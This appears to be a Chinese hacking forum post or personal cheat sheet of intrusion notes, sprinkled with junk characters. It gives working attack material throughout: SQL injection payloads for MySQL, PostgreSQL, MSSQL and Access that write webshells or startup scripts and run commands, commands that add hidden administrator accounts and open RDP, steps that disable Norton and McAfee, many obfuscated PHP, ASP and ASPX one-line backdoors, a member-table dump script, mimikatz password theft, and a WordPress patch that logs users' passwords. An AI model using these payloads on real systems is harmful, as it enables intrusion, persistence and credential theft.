中文版本操作系统中针对mysql添加用户完整代码:8 Z& H& T) K/ Y) u. w% m
+ ~$ r+ F% k/ Nuse test;" ]$ s, @) ]: F" m' r. N5 u
create table a (cmd text);" g, c. L& Z6 `% @" l7 E8 l8 R
insert into a values ("set wshshell=createobject (""wscript.shell"") " );/ R$ ~! u u" C* n5 L- y
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );, |+ o! _* ~& @ `( U" b
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
+ i( ?" V! @/ U4 B1 jselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
- G$ ]2 r5 q! y4 \. f. u, odrop table a;$ b3 u( }4 K, X+ B# H. A" X
: v" H% }. ^0 o. @; b
英文版本:
0 n0 E& G; R" \. j" n+ T# N) C1 v* T* s; f
use test;
$ Q [! O' ~( W0 }- acreate table a (cmd text);& u7 F& j0 H+ c/ _- A, f3 [
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
. v4 z3 J( X) j2 m+ _insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );* k- B2 t3 M! P
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );$ G% w7 m$ S, `2 L% r2 Y& Z
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";' a2 |' [4 M& s5 l6 Y: ?; o0 y
drop table a;. X( h' a8 }! b3 ~5 |
8 J) ^' L8 v. W+ W# `3 [& D s7 k, ^create table a (cmd BLOB);
2 `# J0 Y, r; {3 n9 |# K3 \4 b" Xinsert into a values (CONVERT(木马的16进制代码,CHAR));" w& M2 C' ?) T7 W( ]
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
. M' a3 Z' u8 zdrop table a;
$ Q2 G* W& k' M% d% y5 _5 H% J) O# D; R$ v8 N# }1 V" U% m( G, Y, Q# f
记录一下怎么处理变态诺顿8 }+ c0 ^, M9 W, @0 A
查看诺顿服务的路径0 [6 s" n3 i o: C2 A5 U
sc qc ccSetMgr) `+ }: c. h; [
然后设置权限拒绝访问。做绝一点。。
$ {) i- K4 k1 l0 Ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
) O9 _9 Y: }6 g4 l0 p0 b8 L: K0 |cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
$ P4 l$ f: ~% ^0 [; h" g3 kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
! y. u' l: R" z. S4 y" bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone3 |/ I& ~6 o" }2 e
5 |. S" |, m2 n* w1 {
然后再重启服务器
' W0 ~+ G6 [- p3 i/ Q2 w( ^iisreset /reboot
* a1 m: d+ s8 I; p这样就搞定了。。不过完事后。记得恢复权限。。。。
9 _5 I5 T8 H+ ~; gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
+ [6 J- a* d5 V& Lcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F2 w+ v6 ?3 M5 F# t4 u8 L% z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F3 q. p/ v1 M6 _- v; I& f3 y
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F$ w _ f0 f% }! f; R0 U
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
7 o1 K1 \! \, Y$ u. W( V- I2 H- }7 c6 e$ c$ t
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user'''). ^3 K2 v* L' `4 K- c; A' ~
7 @# i5 `! Q9 @% \7 l- e9 m3 J; bpostgresql注射的一些东西
- @- F1 C0 \8 u3 b如何获得webshell* |- M, z+ `5 H: F: ?
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
2 g/ z7 x' b% j& y, ehttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
( @) P8 p: q' L- S3 N& Shttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
7 y$ Z% S% D! Z- j如何读文件
- m8 R8 c# a6 }" z3 Chttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
" a( H$ \1 f, s: Dhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;9 R4 w, V7 \4 t+ p! `, u+ B
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
+ w' }5 Q, I* \1 T1 k, L- Y' V+ m" n& I. ]* v# T
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
- u4 z C; c3 X! n- X& T当然,这些的postgresql的数据库版本必须大于8.X2 O2 P3 b% {' S
创建一个system的函数:
" i K! q1 k; g' _CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT! b1 I: V) ?6 w
8 d: d. L; v: D创建一个输出表:
+ _/ q% a; V+ H3 zCREATE TABLE stdout(id serial, system_out text)
7 x8 ]! n: d- O& }, _# c1 l! f
/ E& N, k% \3 D$ V4 b2 e执行shell,输出到输出表内:) Z' J: J0 S( m! a2 h: u; \
SELECT system('uname -a > /tmp/test'). O" z( {) f& w
. T3 R$ s3 K( ?; `1 e
copy 输出的内容到表里面;
- {: D; V9 c6 z& Q2 NCOPY stdout(system_out) FROM '/tmp/test'
' ^3 ^/ @' |7 X0 a1 P1 X
8 h6 O% R; Z2 A# u# A& [从输出表内读取执行后的回显,判断是否执行成功' U5 O: J; V* [: X' `% X, t3 S
' s7 D5 X# I+ w( Y4 c4 eSELECT system_out FROM stdout
# G' d4 L' j# f4 U下面是测试例子
9 U& H* r, p! {3 X! L
9 d# B) u* }& o% n! Y$ z, y/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- " U: M# n% L5 t7 p% Q! f8 `
2 F- v$ D- C+ k; @+ P7 g; B; j; `/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
: e+ N8 y( I2 r) F% R( gSTRICT --# j( w F( U) I4 F) {' G+ p0 y
& w1 X. p2 O5 Y0 U
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
% R# L8 y1 R( v. p* d) G( s
, f$ I% v7 E. Y# c; o/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
! J( |$ G7 c4 Y7 {8 q, ^# @5 Y/ D! d4 e9 _9 L8 q7 P. ?
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--. b& Z4 d! h! A# J& l+ z
net stop sharedaccess stop the default firewall* d+ Q( S, }6 s+ C/ I1 E
netsh firewall show show/config default firewall% |7 E4 L& R& c. ]- J
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall/ c9 U; F* d6 v& E$ |" W: z
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
+ q# J; u! ^1 J0 _修改3389端口方法(修改后不易被扫出)* z4 z) h" d) K# l2 p: K0 K
修改服务器端的端口设置,注册表有2个地方需要修改
8 a9 D' ?* e6 S0 U0 u
; Z# |- S8 F P) I6 L[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
+ o: a# W2 z" rPortNumber值,默认是3389,修改成所希望的端口,比如6000" s' R- \! Y4 ?& u
/ z6 Y7 Y# U4 ?; Q3 U
第二个地方:
+ @: l& x# u& t$ ]' A[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] - |" a8 l& ^/ n+ M) k2 P
PortNumber值,默认是3389,修改成所希望的端口,比如6000& q7 s3 U9 q$ f0 i/ x( ~( Z
. Y9 X( E: x3 F: h* Q
现在这样就可以了。重启系统就可以了
^. r% j6 m o5 Z( z3 l1 a, w g5 L0 a X; o! t6 Z/ k1 Q% `2 k `
查看3389远程登录的脚本
# f" R3 E& H( f& ], s2 T! U8 [保存为一个bat文件
+ a ^# Z8 Q# Z% pdate /t >>D:\sec\TSlog\ts.log& U7 _ g& S9 p" j- y! g
time /t >>D:\sec\TSlog\ts.log
0 k9 M" G( k0 k+ k; ~ z- r# onetstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
$ Y( {5 _2 O- r# Qstart Explorer3 Q6 {" d k$ ^! V& I& j
. u% u' F0 x6 q1 f
mstsc的参数:2 d Z& a: P& w; L
/ r# s' u2 K+ M0 C
远程桌面连接4 n ]5 G8 M0 r3 [$ i, e
" d, f6 P* O2 H) f5 s' d+ q M
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
I. @+ R6 k, i* {- V [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
1 T: e) ^9 R! x H2 @9 K/ f& F9 N+ c; f% l1 u
<Connection File> -- 指定连接的 .rdp 文件的名称。
6 k! {2 }# ?# |' }$ s! F' d3 _* x# B: v) u' I' j. L- u
/v:<server[:port]> -- 指定要连接到的终端服务器。
" w* |, a7 R$ o K# `. @& Z* P8 H( s& ^% e* V3 M2 V
/console -- 连接到服务器的控制台会话。2 C0 N: ^7 J& ^9 m
2 ?5 {! t2 k9 T Y4 r/f -- 以全屏模式启动客户端。
- a, }( d, T( [* ~$ M7 n- [
5 X$ e- J" c9 }4 ^/w:<width> -- 指定远程桌面屏幕的宽度。
& @8 W; B( \6 v( M$ f r0 g
6 `! c, C6 i2 |/h:<height> -- 指定远程桌面屏幕的高度。
# N; F" E+ f6 g2 `1 u* T9 H+ G* p& ?8 O
/edit -- 打开指定的 .rdp 文件来编辑。
, J+ H2 f. A. p( a7 K7 ~3 w2 ~+ h% f4 L! \
/migrate -- 将客户端连接管理器创建的旧版% k% D0 j' v" W1 I. ] n
连接文件迁移到新的 .rdp 连接文件。
4 M" c: c; }2 _* g: {
# ^, S: {7 F4 p6 G! k4 O1 P- [; o! j/ y
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
@- n9 {6 `4 o# B p& xmstsc /console /v:124.42.126.xxx 突破终端访问限制数量
1 H: ?1 m( @- m$ U) k. e4 t
, w0 m# y3 V* ~7 ]命令行下开启33899 n" [; M7 a0 ?$ O& M3 D
net user asp.net aspnet /add
0 E, j! ^' T6 v. anet localgroup Administrators asp.net /add7 c: W. q8 ~* \- M+ z
net localgroup "Remote Desktop Users" asp.net /add; C- z# l/ b/ x( @3 W
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D* \0 m* l) b9 a' C
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
2 l3 a5 K$ p3 F* E6 v5 L2 d# d! B% Jecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1/ i+ r$ j) [& e5 `) Q# M
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f' t3 h4 u' {6 f A
sc config rasman start= auto0 h4 X0 W0 Q& ~# I" O
sc config remoteaccess start= auto# p5 l" R+ F$ ]7 m9 q3 F
net start rasman
; \/ H* E2 _6 C8 B2 L8 Bnet start remoteaccess
# z; Z& ^+ X$ _: pMedia
9 D7 J2 @# j& x" @1 D<form id="frmUpload" enctype="multipart/form-data"
+ s; a# O/ G$ f3 h: ~8 s) c4 Uaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
6 M9 L2 \3 D! e( E7 S2 J% \" p4 Z6 _# B<input type="file" name="NewFile" size="50"><br>- j& k; I& T9 z) E6 A
<input id="btnUpload" type="submit" value="Upload">* E& {" D Y3 U" ]) q- K, J, ?
</form>
! V3 s1 f/ \/ L2 v1 }( {) i) f* \& q
control userpasswords2 查看用户的密码% r, Y6 @$ z6 S! W% _5 H
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
7 ]. q# i% h4 h8 |" j& o6 GSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
: _# g- v. ^8 m1 S! {8 R% ~5 X2 \# Z$ k* ]! L5 @; T
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:+ J: ?, h1 P( ?2 O- S% B% b& c
测试1:6 n( @9 q0 N) e7 H8 {9 [
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
- f6 Z- ^3 ?; t- g
! H) S H2 i7 L5 P9 ~: r1 X测试2:+ t" Z! h" A6 _/ J4 c; d1 ]
% d: v' |) d% X+ }4 h q! hcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
N2 X+ J9 I* q2 C8 G
* x% F0 I, p% Ydelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--* t2 A* u" \5 J5 n: d3 ]( j
1 x! a/ x( i8 _7 o. J
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
; K1 j& z) l& |! P5 z4 a8 ~关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
. Q6 a) \ L: s! A可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;' x+ p6 g8 F$ ^2 X; T
net stop mcafeeframework
P5 ~0 W7 N8 K' p1 l/ }& Ynet stop mcshield
" _ V+ v$ Z w4 e0 ~2 wnet stop mcafeeengineservice
8 r$ L- b- J, |- {9 S. S2 Tnet stop mctaskmanager
1 L3 ?* |) e( X8 P7 mhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D6 O, Y; {/ f h t U2 K
+ ?% p( _) h; V! `' p4 y; t
VNCDump.zip (4.76 KB, 下载次数: 1) ( c x; z1 u$ X3 T$ x
密码在线破解http://tools88.com/safe/vnc.php
/ }- v+ x& \$ [" _& hVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
) b3 N" d3 K* n" ^% i. C- }6 e7 H. D* X2 F% c) [
exec master..xp_cmdshell 'net user'' X( Z: c+ c8 ^/ p1 @7 E
mssql执行命令。
2 n4 G* B2 k0 {获取mssql的密码hash查询0 v: |% x+ C7 b7 u
select name,password from master.dbo.sysxlogins9 C7 j! O4 k; Y! `1 n3 K: G
; `2 \+ N& R8 v. W" @/ sbackup log dbName with NO_LOG;4 R0 L2 F4 a6 k( N* ]0 M. N
backup log dbName with TRUNCATE_ONLY;
& @; F( x/ E% mDBCC SHRINKDATABASE(dbName);
' n* h. |4 W5 I* x q+ q% Umssql数据库压缩$ q+ j; {- f* C* U; I
/ H. f) ?/ r' h1 O
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK; L2 o9 l2 G6 X# G# ?
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
1 O8 O9 `! h1 o' X% s
7 b9 x a: v0 u9 E) i9 _8 G6 m4 s/ _backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'% A* m' j; e4 l8 Z' K! t# t
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak$ U& N1 K% i. U: S
$ J; _6 j# ]6 \! e7 y
Discuz!nt35渗透要点:
* {& X# X" [" O; R8 U+ f0 n' S7 Q(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default2 j! k' f, a; {1 _3 ]0 d
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
" y2 D9 d' n) p( ?6 _/ e a3 i% Y; z(3)保存。' Q" A3 ?) d0 }8 p* F! D
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
. t2 ~4 L; ~, Y# q, ?$ g+ L& f8 v" }d:\rar.exe a -r d:\1.rar d:\website\8 D" [2 G2 c' y# \
递归压缩website
( ^. n; u) R6 H" I- v8 A4 \5 Y注意rar.exe的路径
, \ T" i, `: |' K4 g8 G, X8 ?6 F9 y4 }
<?php. L8 x+ J- ?0 ?1 y! t4 N' E' \% m
0 ?$ Z( Z( R7 `, s# u% J0 G* u. Q$telok = "0${@eval($_POST[xxoo])}";
; M/ a T* I1 ]! x i
+ h+ n$ v5 y9 }% J2 V9 l: {: }$username = "123456";
9 v: o' I5 [. {+ M, Z2 E M" J, ~" Y4 } J, s% H) x! @' {; L
$userpwd = "123456";
5 u. T( y; @3 S% Q4 ~5 `" P1 R1 g( p
8 |/ X, I: a: B: R2 M, m" I$telhao = "123456";
$ `4 L6 w+ e+ c; W( ^! U* ~( h7 ?/ @, h0 V, o, f, [3 W5 X: i- ^/ c; [
$telinfo = "123456";8 |( ]* S9 {) s# y6 ]% F: J
- c6 l, X5 u$ `8 A5 k" ~* \% Z9 x; K
?>% C& Z/ j7 ^5 i3 _" H
php一句话未过滤插入一句话木马
, d3 b& z9 w1 y, w1 S: G9 v, l
9 [" s" H, G) u( x# _站库分离脱裤技巧
6 ]) Z3 K$ w9 L+ M0 c( D cexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
$ l" N" n8 }) k0 o1 y" E% vexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'$ @* u1 z% L; v, f% O
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。$ _8 o, K$ b5 I# C5 `! N/ c+ n8 j
这儿利用的是马儿的专家模式(自己写代码)。$ M1 q+ F3 z* B
ini_set('display_errors', 1);
1 z7 x( f8 X, k, V( U+ w/ sset_time_limit(0);
" H' z; Q# y0 Z# W# y/ }error_reporting(E_ALL);
! m; ]. j: h6 T0 N. P$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());' s9 P/ k, T3 A3 p
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
! N3 h1 K1 S$ F$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());! p: s; \0 S8 f: }
$i = 0;
: J# y R8 M% m5 T. H0 d$tmp = '';* d: |% P7 r9 ]5 Q
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {6 p% e( P0 Y, K% T6 c! k- W9 }
$i = $i+1;
5 F% n0 Z6 t$ s! e& o $tmp .= implode("::", $row)."\n";% D1 ]4 v$ O7 O1 p
if(!($i%500)){//500条写入一个文件
' O" w% [. V+ Z& L2 D2 @: b$ s N $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
% Y% T" Y6 S+ k& @- Q, k& ] file_put_contents($filename,$tmp);
& q* V4 B' |. q) X; y' W) D $tmp = '';$ o$ p2 |+ c: ~1 W2 l/ U* O8 A" V
}
6 T$ r8 J, c$ g% ? a# d}$ S& V3 n5 D0 A& F5 Y
mysql_free_result($result);; V4 K1 Y4 U4 V, w
* ]" g8 L$ [* X/ e+ P5 b$ j
3 @' [! n, U8 D9 P5 |: `$ o" J# h8 x/ a! e
//down完后delete+ U) R: o1 {# J0 X" f
9 g" y- E" M) X6 K7 T* m4 F
' Z% H9 V7 t4 Y( L
ini_set('display_errors', 1);% X/ J% ]0 B$ c. Y9 _# e
error_reporting(E_ALL);3 J9 }( ~8 M/ |! Z1 g# I
$i = 0;
) v( r( S5 P3 j# j# zwhile($i<32) {
! y' U9 s7 a5 s" Q$ t+ K7 ] $i = $i+1;
% Z' m! e6 d* v; { $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';3 z4 D0 c' q" s/ Y# F! G2 }% m9 M
unlink($filename);
7 W5 R0 D7 j+ f( [4 z) y} [! ]- O* v9 g' U6 g! d
httprint 收集操作系统指纹
0 R; z! I: K: ^5 r扫描192.168.1.100的所有端口
# Y5 _7 `" s9 M) ]5 [nmap –PN –sT –sV –p0-65535 192.168.1.100+ Y8 r* o7 z" M
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
' v4 a ], G) \) U2 R7 T8 vhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
+ q- C4 V9 B, B* h( VNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host; X- \+ \# N% Y% I; `3 Y! l
/ M0 u; t' b, T2 S4 w; ]5 cDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
. \' E8 s8 B+ ^' S# g
9 J: ]/ j r4 _/ ^/ k; ]! \ MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号) w9 i% z* d S% s' H
7 `' U- b5 k9 G" _1 v: L2 m
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x( |3 G+ l1 \/ i: O
" j' }2 e @* j6 q
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
/ u2 n. W# X7 @0 G% h* \+ N% l) b6 l8 ^8 {) ]9 F$ [
http://net-square.com/msnpawn/index.shtml (要求安装)! |1 `% G, e" S( Y. Z6 j8 w
. p, b, N3 K1 m7 m V
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
1 B# A M' H R* m ~( o7 f. g% h' c& [/ u( c% B4 u, i; q
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
5 b/ K" k* _* J8 p0 h5 ^4 D$ V- bset names gb2312; x9 v: |) R7 h5 [" J+ A
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
. |9 x& ?# x% P8 o
3 y+ f2 }( g" w2 H1 U) C; b2 |7 {mysql 密码修改; x7 F r* N0 P: E9 v
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” ' U5 f% s: e: a4 m5 d& K
update user set password=PASSWORD('antian365.com') where user='root';
" L& Y3 j: J- ~6 c% z1 r' iflush privileges;
5 y- A6 _7 k( o- h0 i高级的PHP一句话木马后门
: K" L0 }/ Y& ?3 A
- Q" F s) u% h0 {入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
4 L% t% O8 ?8 U# R) t
- \4 v1 H/ t9 r) t9 n% o, E x# r6 L, f, V1、
1 R1 P2 B. l: Q3 y2 {' j, H3 C' C( o7 P- y/ ] H
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";+ q, w* V8 I# w: M9 H
( g; A- ]& V- X2 n; m4 P* A$hh("/[discuz]/e",$_POST['h'],"Access");
5 B9 W/ M. X; j0 b7 }# a, r3 [- x9 J: S* m6 p( F; v9 r% I. W
//菜刀一句话2 Z3 J( Z/ w( l/ d1 T
& D/ u* h' f/ j1 h& g- L5 ^ X( A2 v2、
6 s+ W9 U' e0 p$ I! `4 H: s( B7 I! @
- l) D& l: S% u$filename=$_GET['xbid'];
; ? K$ a+ f/ Z1 R% e
! }: T& Y9 R3 O! P9 `5 N6 Z. K) w0 xinclude ($filename);& y0 I% T9 m0 `* K
4 x3 o4 T2 A% A6 U9 ^9 S+ E//危险的include函数,直接编译任何文件为php格式运行7 X$ Q& m( q5 r
! x3 u4 Z( J4 j+ c- S
3、7 g2 [- @+ W0 \) K( j: ^6 B
( b1 K& X# j3 W! L1 g& P
$reg="c"."o"."p"."y";
' i) `: q; W' G* m- v+ z. d! X
( N( x& e% P3 P2 k- W$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);3 ?8 G, P; D- ?: [3 t
o0 v) T, n# f$ `' I! o
//重命名任何文件
& o) _" C1 t5 r) v$ [' U# F- m6 }( o; \% ]+ f! z7 g- j
4、( S& i$ T( ? O1 }4 d' M
. \5 `4 ~7 w$ C5 q" j
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$ A+ N1 R+ V4 ~4 Y; X# L# v
2 l. X/ I! M: w, I$gzid("/[discuz]/e",$_POST['h'],"Access");
" ]$ o* o f6 j+ A/ K; i7 }8 L, C2 E; B. a. h% j
//菜刀一句话2 t% @; Y& K9 w! c }( R/ A8 p0 P) m
3 Z& g# L P( l6 y9 j1 { P6 M+ H5、include ($uid);
# d9 _, w2 ^' Z6 Z8 U1 U S* R" _, F- _: s+ D7 L9 n
//危险的include函数,直接编译任何文件为php格式运行,POST
' }3 d5 ^* q+ P/ [
- w8 x( J4 Z1 Z) L# i- [) v2 }& c& [5 }* D+ w b
//gif插一句话
7 q2 M# ~- G; H; `! ]
" p3 |! i8 z# D7 E. {6、典型一句话
/ Y! Z& I4 s0 S3 ~: p4 ]3 _7 R
* z$ C: ~2 h5 P) h' Z程序后门代码
% N3 D* K, [! z! y; p8 s/ n k<?php eval_r($_POST[sb])?>
T% x+ f4 l3 y5 ~, M) y程序代码* M" R3 ?* l; P) F3 g
<?php @eval_r($_POST[sb])?>0 x z% S- u4 _& y/ X- W
//容错代码
7 M! [9 G- @. v5 D- q2 r/ T程序代码+ n. o, U! d5 T" o0 Y: ?! p
<?php assert($_POST[sb]);?>4 O7 G. b3 @6 b0 d: b ?
//使用lanker一句话客户端的专家模式执行相关的php语句
0 e+ O) n+ [/ d# h& m5 h程序代码
7 K' U9 W' i- J2 L- k B<?$_POST['sa']($_POST['sb']);?>
* O8 _1 P- n5 a( L- v程序代码
( S' e. l; I( I. ~& U( j1 _% _<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
% ^8 x( P2 O8 g程序代码
4 r* H/ L& k& c9 n<?php8 s0 e/ s& [' b) b* f$ A7 A# Q
@preg_replace("/[email]/e",$_POST['h'],"error");
5 I" ?( s+ F$ R?>
# }. Q9 e5 R3 Z7 s; l+ Q# e//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入& A9 g! v- M4 n2 c' l
程序代码1 w: Y: a4 u& W8 E H% z
<O>h=@eval_r($_POST[c]);</O>
3 b6 k J: [) b3 M; R8 A6 k程序代码
0 R; U& [) c* h% l) y7 n<script language="php">@eval_r($_POST[sb])</script>9 y% D X& u7 S+ n6 C
//绕过<?限制的一句话
; _ X* l; x& T* w$ W2 v5 n3 J3 _0 Q5 A* X6 B( t+ k. o- L
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
* x" Q C+ B0 e* }* o8 P6 ]8 }详细用法:; M" F8 u$ }. ~
1、到tools目录。psexec \\127.0.0.1 cmd
, P8 r6 k9 H, z2、执行mimikatz- Z3 a Y; A) [5 q" q6 q- w( r
3、执行 privilege::debug
2 E0 H3 }) C8 v }% b4、执行 inject::process lsass.exe sekurlsa.dll
. z( [ F+ f: }! P x8 G% N; G7 I5、执行@getLogonPasswords' ? J7 G7 r% S: B; J
6、widget就是密码% n% |+ r2 f& U+ B, q' B2 J9 z
7、exit退出,不要直接关闭否则系统会崩溃。* F& a& H8 }& \+ @7 g! ~
/ M g' S7 [. p/ ehttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面, J3 l0 d3 |) ~; `0 R2 {, l
: A$ w, _& u* X; D8 r
自动查找系统高危补丁
0 p$ R$ \9 b6 w) l7 J8 msysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt3 T6 s# g! h+ J) @8 u3 U+ n3 r
A) r) V2 ~/ t突破安全狗的一句话aspx后门
- G% v1 T+ ^; T<%@ Page Language="C#" ValidateRequest="false" %>
% E5 [( l! s L Z<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>/ n" J' z7 ^2 e# {4 r. K, e
webshell下记录WordPress登陆密码
: n0 a, H3 _+ N9 ewebshell下记录Wordpress登陆密码方便进一步社工
1 g \% f& V) p$ B6 H' d在文件wp-login.php中539行处添加:1 c1 d7 p; y1 E4 b# b
// log password2 P$ s" l2 N0 z
$log_user=$_POST['log'];
' Y2 A; M& n/ ~# w+ ^/ t$log_pwd=$_POST['pwd'];
! D! N4 u- S2 @& n* j$log_ip=$_SERVER["REMOTE_ADDR"];5 i9 R$ }6 B0 X2 F! A
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;3 Y/ d, V9 Q! ^; e
$txt=$txt.”\r\n”;, _( T$ L. M3 R# v2 W8 m' e
if($log_user&&$log_pwd&&$log_ip){
' x# i {9 V* r$ `7 J @# D@fwrite(fopen(‘pwd.txt’,”a+”),$txt);3 E+ a0 X& f: i
}
+ }! c- k) [$ S6 Q8 s7 O; F当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。+ r4 C# E: T. K* V/ s8 M
就是搜索case ‘login’& v: j% I9 }, A, @$ h) v
